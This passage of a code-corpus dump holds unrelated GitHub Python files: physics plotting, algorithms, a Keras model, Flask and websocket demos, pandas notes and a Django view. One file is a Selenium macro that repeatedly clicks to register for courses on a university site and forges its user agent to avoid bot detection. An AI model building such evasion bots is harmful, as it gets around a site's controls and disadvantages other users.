    """
    max_height = 0
    global distance
    global a
    global velocity
    for t in range (0,100,1):
        distance += velocity
        if (max_height < distance):
            max_height = distance
        # stop (with a big marker) one step before the height would go negative
        if(distance + velocity <0):
            plt.scatter(t,distance, s=100, c='r')
            plt.pause(0.01)
            break
        plt.scatter(t, distance, s=5, c='r')
        plt.pause(0.01)
        integrate_velocity(a)
    print("Max Height = %2.2f"% max_height)
def integrate_velocity (acceleration):
    """Apply one timestep of `acceleration` to the global velocity, then
    recurse back into integrate_dist() (see the note there about the
    mutual recursion).

    Fix: the original final line had dataset metadata fused onto it
    (` | smkim0508/... | Ballistics_1_4.py | ...`), which is a syntax
    error; restored to the bare call.
    """
    global velocity
    velocity += acceleration
    integrate_dist()
30485090726 | '''
수강신청 실패를 만회하기 위해 제작하였습니다.
제작자: 박결
최종 업데이트: 2023-02-06
기능 1. 수강바구니에 담긴 과목들을 자동으로 새로고침하며 수강신청을 시도합니다.
기능 2. (선택) 수강신청이 성공할 경우 슬랙봇을 통해 사실을 알려줍니다.
'''
from selenium import webdriver
from selenium.webdriver.common.by import By
import chromedriver_autoinstaller
import requests
import time
import json
import os
from user_agent import generate_user_agent
# Build a desktop-Windows user agent so the site does not flag automation.
userAgent = generate_user_agent(os='win', device_type="desktop")
headers = {"User-Agent":userAgent,
        "Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"}
options = webdriver.ChromeOptions()
# NOTE(review): add_argument() expects a string flag; passing the headers
# dict here looks wrong (it is stringified, not applied as HTTP headers) --
# confirm whether this ever had the intended effect.
options.add_argument(headers)
options.add_argument("--disable-gpu")
# Check if chrome driver is installed or not; auto-install a matching
# chromedriver for the local Chrome major version when it is missing.
chrome_ver = chromedriver_autoinstaller.get_chrome_version().split('.')[0]
driver_path = f'./{chrome_ver}/chromedriver.exe'
if os.path.exists(driver_path):
    print(f"chrom driver is insatlled: {driver_path}")
else:
    print(f"install the chrome driver(ver: {chrome_ver})")
    chromedriver_autoinstaller.install(True)
    driver_path = chromedriver_autoinstaller.install()
def getUserInfo():
    """Load credentials and the optional Slack webhook from myInfo.json.

    Returns:
        tuple: (student id, password, webhook URL or False when absent).
    """
    with open('myInfo.json', 'r', encoding='utf-8') as config_file:
        config = json.load(config_file)

    account = config["information"]
    hook = config["slack-bot"]["hook"]
    # normalise a missing hook to False so callers can truth-test it
    return account["ID"], account["PW"], hook if hook is not None else False
class GetCourses:
    """Automates SKHU course registration: logs in, opens the registration
    page, then repeatedly clicks every course left in the course cart."""

    def __init__(self, user_id, user_pw, hook, driver):
        '''
        user_id : student id number
        user_pw : password
        hook : Slack webhook URL (falsy when Slack notification is disabled)
        driver : selenium Chrome webdriver instance
        '''
        # Bug fix: both credential assignments originally ended with a stray
        # trailing comma (`self.user_id = user_id,`), which silently wrapped
        # the id and the password in 1-tuples before they reached send_keys().
        self.user_id = user_id
        self.user_pw = user_pw
        self.hook = hook
        self.driver = driver

    def sendMessage(self, lectureName):
        '''
        Posts a Slack message when a course registration succeeds.
        '''
        hook = self.hook
        title = '수강 신청 성공'
        content = f"<{lectureName}> 과목을 잡았습니다~!"
        # post the notification to the Slack incoming webhook
        requests.post(
            hook,
            headers={'content-type':'application/json'},
            json={
                'text' : title,
                'blocks': [
                    {
                        'type':'section', # a section block keeps messages from being grouped
                        'text':{
                            'type':'mrkdwn',
                            'text':content
                        }
                    }
                ]
            }
        )

    def getSugangUrl(self):
        '''
        Opens the registration site, logs in, and starts the retry loop.
        '''
        self.driver.get('https://sugang.skhu.ac.kr/')
        self.driver.implicitly_wait(5)
        self.driver.switch_to.frame('Main') # switch into the main iframe
        # NOTE(review): the lines below use the module-level `driver` global
        # rather than self.driver -- this only works because main() passes
        # the same object in; consider self.driver for consistency.
        login_id = driver.find_element(By.ID, 'txtUserID')
        login_pw = driver.find_element(By.ID, 'txtPwd')
        login_bt = driver.find_element(By.ID, 'btn-login')
        login_id.send_keys(self.user_id)
        login_pw.send_keys(self.user_pw)
        login_bt.click()
        self.driver.implicitly_wait(5)
        # click the "start registration" button
        time.sleep(0.5)
        self.driver.execute_script("fnMenuLoad('/core/coreNotice1')")
        self.driver.implicitly_wait(5)
        start_bt = driver.find_element(By.CLASS_NAME, 'btnStart')
        start_bt.click()
        time.sleep(1)
        self.tryGetLecture()

    def checkAlert(self):
        """Dismiss a confirmation dialog if one is present.

        Returns True when a dialog was found and clicked away (i.e. a
        registration attempt produced a response), False otherwise.
        """
        try:
            alertBtn = self.driver.find_element(By.XPATH, "/html/body/div[2]/div[2]/div/div/div/div/div/div/div/div[4]/button[1]")
            alertBtn.click()
            time.sleep(0.5)
            return True
        except:
            return False

    def tryGetLecture(self):
        '''
        Repeatedly attempts registration for every course in the cart;
        finishes once every course has been grabbed.
        '''
        # table_tr = self.driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr')
        # cart listing (the tr-based approach above did not work, so the
        # name cells and buttons are fetched separately)
        lectureNames = self.driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr/td[2]')
        lectureNames = [x.text for x in lectureNames]
        lectureBtns = self.driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr/td[1]/button')
        for i in range(len(lectureBtns)):
            print(f"{lectureNames[i]} : {lectureBtns[i]}")
        print(lectureNames)
        elementNum = 1
        # simple counter just to see how many passes the loop has made
        iters = 0
        reset = False # set when a registration succeeded, to refresh state
        # while len(table_tr) != 1:
        while len(lectureBtns) != 1:
            for i in range(2):
                # course name of the row currently being attempted
                lectureName = self.driver.find_element(By.XPATH, '//*[@id="GridBasket"]/tbody/tr[@id="{}"]/td[2]'.format(elementNum)).text
                selectBtn = self.driver.find_element(By.XPATH, '//*[@id="GridBasket"]/tbody/tr[@id="{}"]/td[1]/button'.format(elementNum))
                # NOTE(review): the paired statements below (two clicks, two
                # prints, two sleeps, two success notifications) look like
                # merge residue; both variants are kept to preserve current
                # behaviour -- confirm which of each pair is intended.
                selectBtn.click()
                lectureBtns[elementNum].click()
                ## debug output for testing
                print(lectureName, f": 클릭함 {iters}-{i}")
                print(lectureNames[elementNum], f": 클릭함 {iters}-{i}")
                time.sleep(2)
                time.sleep(0.1)
                # check whether a confirmation dialog appeared
                while True: # keep dismissing dialogs until none remain
                    reset = self.checkAlert()
                    if reset == False:
                        break
                if reset == True:
                    # a registration succeeded: the page refreshed and the
                    # table changed, so re-fetch the table elements
                    table_tr = driver.find_elements(By.XPATH, '//*[@id="GridBasket"]/tbody/tr')
                    self.sendMessage(lectureName) # Slack notification
                    print(f"<{lectureName}> 수강신청 성공~!")
                    self.sendMessage(lectureNames[elementNum]) # Slack notification
                    print(f"<{lectureNames[elementNum]}> 수강신청 성공~!")
                    del lectureBtns[elementNum]
                    del lectureNames[elementNum]
                    reset = False
                else:
                    elementNum += 1 # move on to the next row
                    if elementNum > len(lectureBtns): # wrapped past the last row
                        elementNum = 1 # start again from the first row
            iters += 1
        print("All Clear~!")
if __name__=="__main__":
    # Load credentials, launch Chrome with the auto-installed driver,
    # and start the registration macro.
    user_id, user_pw, hook = getUserInfo()
    # driver_path = "C:\chromedriver\chromedriver.exe"
    driver = webdriver.Chrome(driver_path)
    gc = GetCourses(user_id, user_pw, hook, driver)
    # start the macro
    gc.getSugangUrl()
| kyeul611/Automation_repo | 수강신청_매크로/getCourses.py | getCourses.py | py | 7,357 | python | ko | code | 0 | github-code | 50 |
# Alphabetically sorted list rotated so that the smallest entry
# ('abberation', index 8) sits at the end -- sample data for the
# rotation-point finders below.
# Fix: the first line had dataset metadata fused onto it
# (`25535630570 | words = [`), a syntax error; restored to clean code.
words = [
    'engender',
    'karpatka',
    'othellolagkage',
    'ptolemaic',
    'retrograde',
    'supplant',
    'undulate',
    'xenoepist',
    'abberation',
]
def get_rotating_point_idx_simple(l):
    """Linear scan: return the first index whose value drops below its
    (truthy) predecessor, or 0 when the list never decreases."""
    for position in range(1, len(l)):
        previous = l[position - 1]
        if previous and l[position] < previous:
            return position
    return 0
def get_rotating_point_idx(l):
    """Return the index of the rotation point (smallest element) of a
    rotated, ascending, duplicate-free list; 0 for an empty or unrotated list.

    Fixes in this revision:
    * the original referenced the module-level ``words`` list instead of
      the parameter ``l`` (wrong answers for any other input);
    * the original's loop advanced neither bound when ``l[mid] == anchor``,
      so it could spin forever;
    * an empty list no longer raises IndexError.
    """
    # classic pivot binary search: compare the midpoint against the right
    # edge to decide which half still contains the minimum
    left, right = 0, len(l) - 1
    while left < right:
        mid = (left + right) // 2
        if l[mid] > l[right]:
            left = mid + 1
        else:
            right = mid
    return max(left, 0)
# Exercise both implementations on the sample data; each should print the
# rotation-point word ('abberation').
index = get_rotating_point_idx_simple(words)
print(words[index])
index = get_rotating_point_idx(words)
print(words[index])
| trueneu/algo | interviewcake/rotating_point.py | rotating_point.py | py | 1,158 | python | en | code | 0 | github-code | 50 |
42000639061 | from Explainer import explainer
from VGG import vgg
from ResNet50Mod import resnet50
from tensorflow.keras.utils import plot_model
from tensorflow.keras import layers as KL
from tensorflow.keras.models import Model
import os
import matplotlib.pyplot as plt
class ExplainerClassifierCNN:
    """ ExplainerClassifierCNN class

    Wraps an "explainer" sub-network and a classifier (resnet50 or vgg)
    into a single end-to-end Keras model (self.e2e_model) that outputs
    both an explanation map and a class decision for each input image.
    """
    def __init__(
        self,
        img_size=(224, 224),
        num_classes=2,
        clf="resnet50",
        init_bias=3.0,
        pretrained=False,
    ):
        """__init__ class constructor
        Keyword Arguments:
            img_size {tuple} -- image dimensions (default: {(224, 224)})
            num_classes {int} -- number of classes (default: {2})
            clf {str} -- classifier architecture (default: {"resnet50"})
            init_bias {float} -- initial bias for explainer's batch normalisation layer (default: {3.0})
            pretrained {bool} -- whether or not to load a pretrained model (resnet pretrained on imagenet) (default: {False})
        """
        super(ExplainerClassifierCNN, self).__init__()
        self.img_size = img_size
        self.num_classes = num_classes
        self.clf = clf
        self.init_bias = init_bias
        self.pretrained = pretrained
        # classifier: any value other than "resnet50" falls back to VGG
        if self.clf == "resnet50":
            self.classifier = resnet50(
                img_size=self.img_size,
                num_classes=self.num_classes,
                pretrained=self.pretrained,
            )
        else:
            self.classifier = vgg(img_size=self.img_size, num_classes=self.num_classes)
        # explainer
        self.explainer = explainer(img_size=self.img_size, init_bias=self.init_bias)
        # build the model
        self.build_model()
    def build_model(self):
        """build_model builds the end-to-end model

        Wires image -> explainer -> explanation, then feeds both the
        explanation and the raw image into the classifier; the resulting
        Model returns [explanation, decision].
        """
        input_image = KL.Input(tuple(list(self.img_size) + [3]), name="input_img")
        explanation = self.explainer(input_image)
        decision = self.classifier([explanation, input_image])
        self.e2e_model = Model(inputs=[input_image], outputs=[explanation, decision])
    def save_architecture(self, timestamp, path):
        """save_architecture saves a plot of the whole architecture and of its submodules
        Arguments:
            timestamp {str} -- destination folder name
            path {str} -- destination path
        """
        self.exp_model_filename = timestamp + "_model_exp.png"
        self.dec_model_filename = timestamp + "_model_clf.png"
        self.e2e_model_filename = timestamp + "_model_e2e.png"
        plot_model(self.explainer, to_file=os.path.join(path, self.exp_model_filename))
        print("Model printed to " + os.path.join(path, self.exp_model_filename))
        plot_model(self.classifier, to_file=os.path.join(path, self.dec_model_filename))
        print("Model printed to " + os.path.join(path, self.dec_model_filename))
        plot_model(self.e2e_model, to_file=os.path.join(path, self.e2e_model_filename))
        print("Model printed to " + os.path.join(path, self.e2e_model_filename))
    def save_explanations(
        self, datagen, phase, path, test=False, classes=None, cmap=None,
    ):
        """save_explanations generates and saves explanations for a set of images given by the data generator
        Arguments:
            datagen {tf.keras.utils.Sequence} -- data generator
            phase {int} -- training phase
            path {str} -- directory to store the generated explanations
        Keyword Arguments:
            test {bool} -- whether we are running inference on the test set or not (default: {False})
            classes {list} -- list of class names (default: {None})
            cmap {str} -- matplotlib colourmap for the produced explanations (default: {None})
        """
        # defines colourmap and pixel value range
        # NOTE(review): this compares against the *string* "None" (presumably
        # a CLI-arg sentinel); the default value None takes the else branch
        # and leaves cmap=None for imshow -- confirm that is intended.
        if cmap == "None":
            cmap = "seismic"
            mode = "captum" # for better comparison with captum methods
            vmin, vmax = -1, 1
        else:
            vmin, vmax = 0, 1
            mode = "default"
        print("\nSAVING EXPLANATIONS")
        timestamp = path.split("/")[-1]
        for batch_imgs, input_dict in datagen:
            batch_labels = datagen.batch_labels
            batch_names = datagen.batch_names
            batch_expls, batch_probs = self.e2e_model.predict(
                (batch_imgs, input_dict), verbose=0
            )
            # traverse the batch and plot and save each generated explanation
            for idx, img in enumerate(batch_imgs):
                img = batch_imgs[idx]
                expl = batch_expls[idx]
                # side text: true label followed by one probability per class
                string = "Label: " + classes[batch_labels[idx]] + "\n"
                for i, c in enumerate(classes):
                    string += c + " " + str(round(batch_probs[idx][i], 6,)) + "\n"
                # saves figure comparing the original image with the generated explanation side-by-side
                plt.figure(1, figsize=(12, 5))
                plt.subplot(121)
                ax = plt.gca()
                ax.relim()
                ax.autoscale()
                ax.axes.get_yaxis().set_visible(False)
                ax.axes.get_xaxis().set_visible(False)
                plt.title("Original Image", fontsize=14)
                plt.imshow(img)
                plt.subplot(122)
                ax = plt.gca()
                ax.axes.get_yaxis().set_visible(False)
                ax.axes.get_xaxis().set_visible(False)
                plt.title("Explanation", fontsize=14)
                plt.imshow(expl, vmin=vmin, vmax=vmax, cmap=cmap)
                plt.text(
                    0.91, 0.5, string, fontsize=12, transform=plt.gcf().transFigure
                )
                # test-set filenames also encode the mode and colourmap used
                if test:
                    plt.savefig(
                        os.path.join(
                            path,
                            "{}_phase{}_ex_img_test_{}_{}_{}".format(
                                timestamp,
                                str(phase),
                                mode,
                                cmap,
                                batch_names[idx].split("/")[-1],
                            ),
                        ),
                        bbox_inches="tight",
                        transparent=True,
                        pad_inches=0.1,
                    )
                else:
                    plt.savefig(
                        os.path.join(
                            path,
                            "{}_phase{}_ex_img_{}".format(
                                timestamp, str(phase), batch_names[idx].split("/")[-1],
                            ),
                        ),
                        bbox_inches="tight",
                        transparent=True,
                        pad_inches=0.1,
                    )
                plt.close()
        print()
| icrto/xML | Keras/ExplainerClassifierCNN.py | ExplainerClassifierCNN.py | py | 6,917 | python | en | code | 10 | github-code | 50 |
39545271542 | from astropy.coordinates import SkyCoord
from astropy.units import Quantity
class Region:
    """
    Base class describing a sky region.

    A region is defined either by its diameter (``diam``) or by a
    ``height``/``width`` pair -- never both at the same time.

    Args:
        name (str): The name of the region.
        coords (SkyCoord): The coordinates of the region.
        diam (Quantity, optional): The diameter of the region. Defaults to None.
        height (Quantity, optional): The height of the region. Defaults to None.
        width (Quantity, optional): The width of the region. Defaults to None.
        serial (int): The serial id of the region in the cdalvaro database. Defaults to None.

    Raises:
        ValueError: If neither diam nor both height and width are specified.
        ValueError: If diam is combined with height or width.
    """

    def __init__(self,
                 name: str,
                 coords: SkyCoord,
                 diam: Quantity = None,
                 height: Quantity = None,
                 width: Quantity = None,
                 serial: int = None):
        if diam is not None:
            # a diameter excludes the rectangular description
            if height is not None or width is not None:
                raise ValueError("You cannot specify 'diam' with 'height' or 'width' arguments")
            self.diam = diam
        elif height is None or width is None:
            # no diameter and an incomplete (or absent) rectangle
            raise ValueError("You must specify 'diam' argument or 'height' and 'width' arguments")
        else:
            self.height = height
            self.width = width

        self.name = name
        self.coords = coords
        self.serial = serial

    def __str__(self) -> str:
        return self.name

    def __repr__(self) -> str:
        return str(self)

    def __eq__(self, other) -> bool:
        # Regions compare by name; anything else compares against its
        # string representation.
        other_name = other.name if isinstance(other, Region) else f"{other}"
        return self.name == other_name

    def __hash__(self) -> int:
        return hash(self.name)
| cdalvaro/decocc | cdalvaro/models/region.py | region.py | py | 2,226 | python | en | code | 0 | github-code | 50 |
39321151581 | from client import *
import signal
# Create the websocket client against the local test server and start
# its background connection.
client = CrypticClient(log_level=logging.INFO)
client.URI = "ws://localhost:8000"
client.start_client()
def receiver(json: Json):
    """Callback invoked with each Json payload received for a registered
    action; simply echoes it. (The parameter name shadows the stdlib
    `json` module name -- harmless here since the module is not used.)"""
    print(json)
def action():
    """Register receivers for the signup/signin actions and send a signin
    request. (The local variable `action` shadows this function's own
    name, and `json` shadows the stdlib module name -- both are local
    only, so callers are unaffected.)"""
    action = "signup"
    client.add_receiver(action, receiver)
    json = Json(action=action, id="mimi", key="prmp")
    # client.send_json(json)
    action = "signin"
    client.add_receiver(action, receiver)
    json = Json(action=action, id="mimi", key="prmp")
    client.send_json(json)
    print(json)
# Re-run the requests once the client reports it is connected.
client.on_connected = action
def close_sig_handler(signal: signal.Signals, frame):
    """SIGINT handler: re-trigger action() until STOP+1 interrupts have
    been received, then close the client and exit. (The parameter name
    `signal` shadows the signal module inside this function.)"""
    global c
    c += 1
    # os.system(f'{os.sys.executable} {os.sys.argv[0]}')
    print(f"Exiting in {STOP}: {c}", end="\r")
    if c > STOP:
        client.send_close(reason="Test")
        client.shutdown()
        exit()
    else:
        action()
c = 1  # number of SIGINTs received so far (mutated by close_sig_handler)
STOP = 2  # after this many SIGINTs the client disconnects and the process exits
signal.signal(signal.SIGINT, close_sig_handler)
# Keep the process alive for the websocket client. Fix: the original
# `while 1: ...` busy-wait pinned a CPU core at 100%; sleeping is
# equivalent here because SIGINT interrupts the sleep and the handler
# still runs immediately.
import time
while True:
    time.sleep(0.5)
| prmpsmart/cryptic | main_client.py | main_client.py | py | 938 | python | en | code | 0 | github-code | 50 |
13120989975 | from flask import Flask
import RPi.GPIO as GPIO
# BCM pin numbers for the two LEDs, configured as outputs.
Rled = 4; Bled = 5
GPIO.setmode(GPIO.BCM)
GPIO.setup(Rled, GPIO.OUT)
GPIO.setup(Bled, GPIO.OUT)
app = Flask(__name__)
@app.route("/")
def mainPage():
    """Landing page: on/off links for each LED (handled by led() below)."""
    return '''
    <h1> Main Page </h1>
    <h2> RED LED <a href="led/red/on">on</a>  <a href="/led/red/off">off</a></h2>
    <h2> BLUE LED <a href="led/blue/on">on</a>  <a href="/led/blue/off">off</a></h2><br>
    '''
@app.route("/led/<color>/<status>")
def led(color, status):
    """Switch the requested LED ("red"/"blue") on or off and confirm in HTML.

    NOTE(review): any other color/status combination falls through every
    branch and returns None, which Flask reports as a 500 error -- confirm
    whether a 404 or redirect would be preferable.
    """
    if color == "red":
        if status == "on":
            GPIO.output(Rled, GPIO.HIGH)
            return '''
            <h1>RED LED ON</h1>
            <h2><a href="/">Go Main Page</a></h2>
            '''
        elif status == "off":
            GPIO.output(Rled, GPIO.LOW)
            return '''
            <h1>RED LED OFF</h1>
            <h2><a href="/">Go Main Page</a></h2>
            '''
    elif color == "blue":
        if status == "on":
            GPIO.output(Bled, GPIO.HIGH)
            return '''
            <h1>BLUE LED ON</h1>
            <h2><a href="/">Go Main Page</a></h2>
            '''
        elif status == "off":
            GPIO.output(Bled, GPIO.LOW)
            return '''
            <h1>BLUE LED OFF</h1>
            <h2><a href="/">Go Main Page</a></h2>
            '''
if __name__ == "__main__":
    try:
        # listen on all interfaces so the Pi is reachable from the LAN
        app.run(host="0.0.0.0")
    finally:
        # always release the GPIO pins, even if the server crashes
        GPIO.cleanup()
| tldus2355/2021-IoT-Project | 07_web/flask_led_task.py | flask_led_task.py | py | 1,501 | python | en | code | 0 | github-code | 50 |
def getStudentNames(count=12):
    """Prompt the user for `count` student names and return them as a list.

    `count` generalises the previously hard-coded 12 while keeping the
    original behaviour as the default. (The original `def` line also had
    dataset metadata fused onto it; restored to clean code. The redundant
    str() around input() was dropped -- input() already returns str.)
    """
    studentsList = []
    for i in range(count):
        print(i)  # 0-based number of the entry being typed, as before
        studentName = input("Enter the student's name: ")
        studentsList.append(studentName)
    return studentsList
def getAlphabeticalList(tempList):
    """Sort `tempList` in place alphabetically and return the same list.

    Bug fix: the original evaluated `tempList.sort` without calling it
    (missing parentheses), so the list was never actually sorted.
    """
    tempList.sort()
    return tempList
def getReverseList(tempList):
    """Reverse `tempList` in place and return the same list object."""
    tempList.reverse()
    return tempList
def writeListToFile(tempList, fileName):
    """Write each item of `tempList` to `fileName`, one per line.

    Fix: the file is now opened via a `with` block, guaranteeing it is
    closed (and flushed) even if a write raises.
    """
    with open(fileName, 'w') as writtenFile:
        for item in tempList:
            writtenFile.write(item + '\n')
def readListFromFile(fileName):
    """Read `fileName` and return its lines without trailing newlines.

    Fix: the original never closed the file handle (resource leak); the
    `with` block guarantees closure. `split('\\n')[0]` is kept so behaviour
    matches the original exactly (it also drops anything after an embedded
    newline, which readlines() never produces).
    """
    with open(fileName, 'r') as readFile:
        tempList = readFile.readlines()
    return [item.split('\n')[0] for item in tempList]
def main():
    """Lab driver: gather names, sort, reverse, add two fixed names,
    round-trip through names.txt, and print the result."""
    studentsList = getStudentNames()
    studentsList = getAlphabeticalList(studentsList)
    studentsList = getReverseList(studentsList)
    studentsList.append('Rene Polanco')
    studentsList.insert(0, 'Logan Ingram')
    writeListToFile(studentsList, 'names.txt')
    readList = readListFromFile('names.txt')
    print(readList)
    studentTuple = tuple(studentsList)  # demonstrates tuple conversion (otherwise unused)

# Fixes: the bare `main()` call had dataset metadata fused onto it
# (a syntax error), and it now sits under a __main__ guard so importing
# this module no longer triggers the interactive prompts.
if __name__ == "__main__":
    main()
11269807288 | import pandas as pd
from pandas import Series, DataFrame
import numpy as np
obj = Series([4.5, 7.2, -5.3, 3.6], index=['d', 'b', 'a', 'c'])
obj
obj2 = obj.reindex(['a', 'b', 'c', 'd', 'e'], fill_value=0)
obj2
obj3 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])
obj3
obj3.reindex(range(6))
obj3.reindex(range(6), method='ffill')#bfill 뒤의 값으로 채워 넣는다
frame = DataFrame(np.arange(9).reshape((3, 3)), index=['a', 'c', 'd'],
columns=['Ohio', 'texas', 'California'])
frame
frame2 = frame.reindex(['a', 'b', 'c', 'd'])
frame2
states = ['Ohio', 'texas', 'California']
frame.reindex(index=['a', 'b', 'c', 'd'], method='ffill')
obj = Series(np.arange(5.), index=['a', 'b', 'c', 'd', 'e'])
new_obj = obj.drop('c')
new_obj
data = DataFrame(np.arange(16).reshape((4, 4)),
index=['Ohio', 'Colorada', 'Utah', 'New York'],
columns=['one', 'two', 'three', 'four'])
data
data.drop(['Colorada', 'Ohio'])
data.drop('two',axis=1)
data.drop(['two', 'four'],axis=1)
obj = Series(np.arange(4.), index=['a', 'b', 'c', 'd'])
obj
obj['b']
obj[1]
obj[2:4]
obj[['b', 'a', 'd']]
obj[[1, 3]]
obj[[1, 3]]
obj[obj < 2]
obj['b':'c'] = 5
obj
data
data['two']
data[['two', 'one']]
data[:2]
data[data['three'] > 5]
data < 5
data[data < 5] = 0
data
data.loc['Colorada', ['two', 'three']]#column , [row select]
data.loc['Colorada']
data.loc[['Colorada', 'Ohio'], ['two', 'three']]
data.iloc[2]
data.loc[:'Utah', 'two']#행 Utah 까지 / 열 => 'two'
data
data.ix[data.three > 5, :3]
data.three > 5
df1 = DataFrame(np.arange(9.).reshape((3, 3)), columns=list('bcd'),
index=['Ohio', 'Texas', 'Colorado'])
df2 = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),
index=['Utah', 'Ohio', 'Texas', 'Oregon'])
df1
df2
df1+df2
df1.add(df2, fill_value=0)
df2.add(df1, fill_value=0)
arr = np.arange(12.).reshape((3, 4))
arr
arr[0]
arr - arr[0]
frame = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),
index=['Utah', 'Ohio', 'Texas', 'Oregon'])
series = frame.iloc[0]
series
frame
frame + series
series2 = Series(range(3), index=['b', 'e', 'f'])
series2#이건 아무런 name 이 없음
frame + series2
series
type(frame['b'])
type(frame)
series3 = frame['d']
frame.sub(series3, axis=0)
frame
series3
frame = DataFrame(np.random.randn(4, 3), columns=list('bde'),
index=['Utah', 'Ohio', 'Texas', 'Oregon'])
frame
np.abs(frame)#절대값
f = lambda x: x.max() - x.min()
frame.apply(f)
obj = Series(range(4), index=['d', 'a', 'b', 'c'])
obj.sort_index()
frame = DataFrame(np.arange(8).reshape((2, 4)), index=['three', 'one'],
columns=['d', 'a', 'b', 'c'])
frame
frame.sort_index(axis=0)
frame.sort_index(axis=1, ascending=False)
frame.sort_index(axis=1)
obj = Series([4, 7, -3, 2])
obj
obj.sort_values()
obj = Series([4, np.nan, 7, np.nan, -3, 2])
obj
obj.sort_index()
obj.sort_values()
frame = DataFrame({'b': [4, 7, -3, 2], 'a': [0, 1, 0, 1]})
frame
frame.sort_values(by='b')#b의 값기준으로 정렬
frame.sort_index(axis=1).sort_values(by='b') #a, b 순서 정렬 => b의 값별로 정렬
frame.sort_values(by=['a', 'b'])
'''
min 같은 값을 가지는 그룹을 낮은 순위로
max 같은 값을 가지는 그룹을 높은 순위로
average 같은 값을 가지는 항목의 평균 값을 순위로(defalut)
first 데이터 내에서 위치에 따라 순위를 매김
'''
obj = Series([7, 0-5, 7, 4, 2, 0, 4])
obj.rank()#공통도 나타 날 수 있음
obj.rank(method='first')#데이터 상의 나타내는 순서
obj.rank(ascending=False, method='max')#내림차순 순위
frame.rank(axis=1)
frame
obj = Series(range(5), index=['a', 'a', 'b', 'b', 'c'])
obj
obj.index.is_unique
obj['a']#중복되면 Series 값
obj['c']#중복되지 않으면 스칼라값
df = DataFrame(np.random.randn(4, 3), index=['a', 'a', 'b', 'b'])
df
df.loc['b']
df = DataFrame([[1.4, np.nan], [7.1, -4.5], [np.nan, np.nan], [0.75, -1.3]], index=['a', 'b', 'c', 'd'], columns=['one', 'two'])
df
df.sum()
df.sum(axis=0)
df.sum(axis=1)
df.mean(axis=1, skipna=False)#na 포함하겠다.
df
df.describe()
df = DataFrame(np.random.normal(loc=0, scale= 0.01, size=(5,4)),
index=['2014-07-07', '2014-07-08', '2014-07-09', '2014-07-10', '2014-07-11',],
columns=['AAPL', 'GOOG', 'IBM', 'MSFT']
)
df.index.name = 'Date'
df
df.MSFT.corr(df.IBM)#NA가 아니고 연속하는 두 Series에 대해 상관관계를 계산
df.MSFT.cov(df.IBM)# 공분산
df.corr()#상관관계
df.cov()#공분산
obj = Series(['c', 'a', 'd', 'a', 'a', 'b', 'b', 'c', 'c'])
obj
obj.unique()
obj.value_counts()
pd.value_counts(obj.values, sort=False)
mask = obj.isin(['b', 'c'])
mask
data = DataFrame({'Q1': [1, 3, 4, 3, 4],
'Q2': [2, 3, 1, 2, 3],
'Q3': [1, 5, 2, 4, 4]})
data
result = data.apply(pd.value_counts).fillna(0)
result
data
result = data.apply(pd.value_counts).fillna(0)#안에 있는 값들을 인덱스로 만듬.
string_data = Series(['aardvark', 'artichoke', np.nan, 'avocado'])
string_data
string_data.isnull()
string_data[0] = None
string_data.isnull()
#누락된 데이터 골라내기
from numpy import nan as NA
data = Series([1, NA, 3.5, 7])
data.dropna()
data[data.notnull()]
data = DataFrame([[1, 6.5, 3], [1, NA, NA],
[NA, NA, NA], [NA, 6.5, 3]])
data
data.dropna()#NA가 있으면 싹다~ 드랍시킴.
data.dropna(how='all')#전부 NA 인 로우만 드랍시킴
data[4] = NA
data
data.dropna(axis=1, how='all')
df = DataFrame(np.random.randn(7, 3))
df.iloc[:4, 1] = NA; df.iloc[:2, 2] = NA
df
df.dropna(thresh=3)#몇개 이상만
df.fillna(0)#0으로 누락된 값 채우기
df.fillna({1: 0.5, 2: -1})
_ = df.fillna(0, inplace=True)
df
df = DataFrame(np.random.randn(6, 3))
df
df.iloc[2:, 1] = NA; df.iloc[4:, 2] = NA
df
df.fillna(method='ffill')
df.fillna(method='ffill', limit=2)#2만 채우기
data = Series([1, NA, 3.5, NA, 7])
data
data.fillna(data.mean())
'''
계층적 색인
'''
data = Series(np.random.randn(10),
index=[['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'd', 'd'],
[1, 2, 3, 1, 2, 3, 1, 2, 2, 3]])
data
data.index
data['b']
data['b':'c']
data.loc[['b', 'd']]
data[:, 2]#하위 객체
data.unstack()
data.unstack().stack()
frame = DataFrame(np.arange(12).reshape((4, 3)),
index=[['a', 'a', 'b', 'b'], [1, 2, 1, 2]],
columns=[['Ohio', 'Ohio', 'Colorado'],
['Green', 'Red', 'Green']])
frame
frame.index.names = ['key1', 'key2']
frame.columns.names = ['state', 'color']
frame
frame['Ohio']
frame.unstack().unstack()
frame.sum(level='key2')#key2를 기준으로 값을 합침
frame.sum(level='color', axis=1)
frame
frame = DataFrame({'a': range(7), 'b': range(7, 0, -1),
'c': ['one', 'one', 'one', 'two', 'two', 'two','two'],
'd': [0, 1, 2, 0 ,1, 2, 3]})
frame
frame2 = frame.set_index(['c', 'd'])
frame2
frame2 = frame.set_index(['c', 'd'], drop=False)
frame2
frame2.reset_index()
ser = Series(np.arange(3.), index=['a', 'b', 'c'])
ser[-1]
| epicarts/python3_practice | data_analysis/essential_pandas.py | essential_pandas.py | py | 7,119 | python | ko | code | 0 | github-code | 50 |
8193695529 | from django.shortcuts import render
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
import os
from .serializers import *
from django.core.files import File
from django.conf import settings
from rest_framework.response import Response
from django.http import HttpResponse
import uuid
class UploadViewSet(viewsets.ViewSet):
    """Authenticated file upload (POST) and download (GET with `fid`)."""

    permission_classes = [IsAuthenticated]

    def post(self, request):
        """Store the uploaded "file" part under MEDIA_ROOT with a random
        hex name (original extension preserved) and record it via
        UploadSerializer.

        Returns error_code 0 plus the serialized record on success,
        400 when no file part is present, or 500 with serializer errors.
        """
        file = request.FILES.get("file", None)
        if file is None:
            # Robustness fix: the original crashed with AttributeError
            # ("'NoneType' object has no attribute 'name'") when the
            # multipart body had no "file" part.
            return Response({"error_code": 400, "error": "no file uploaded"})
        ext = os.path.splitext(file.name)[-1]
        name = uuid.uuid4().hex
        filename = name+ext
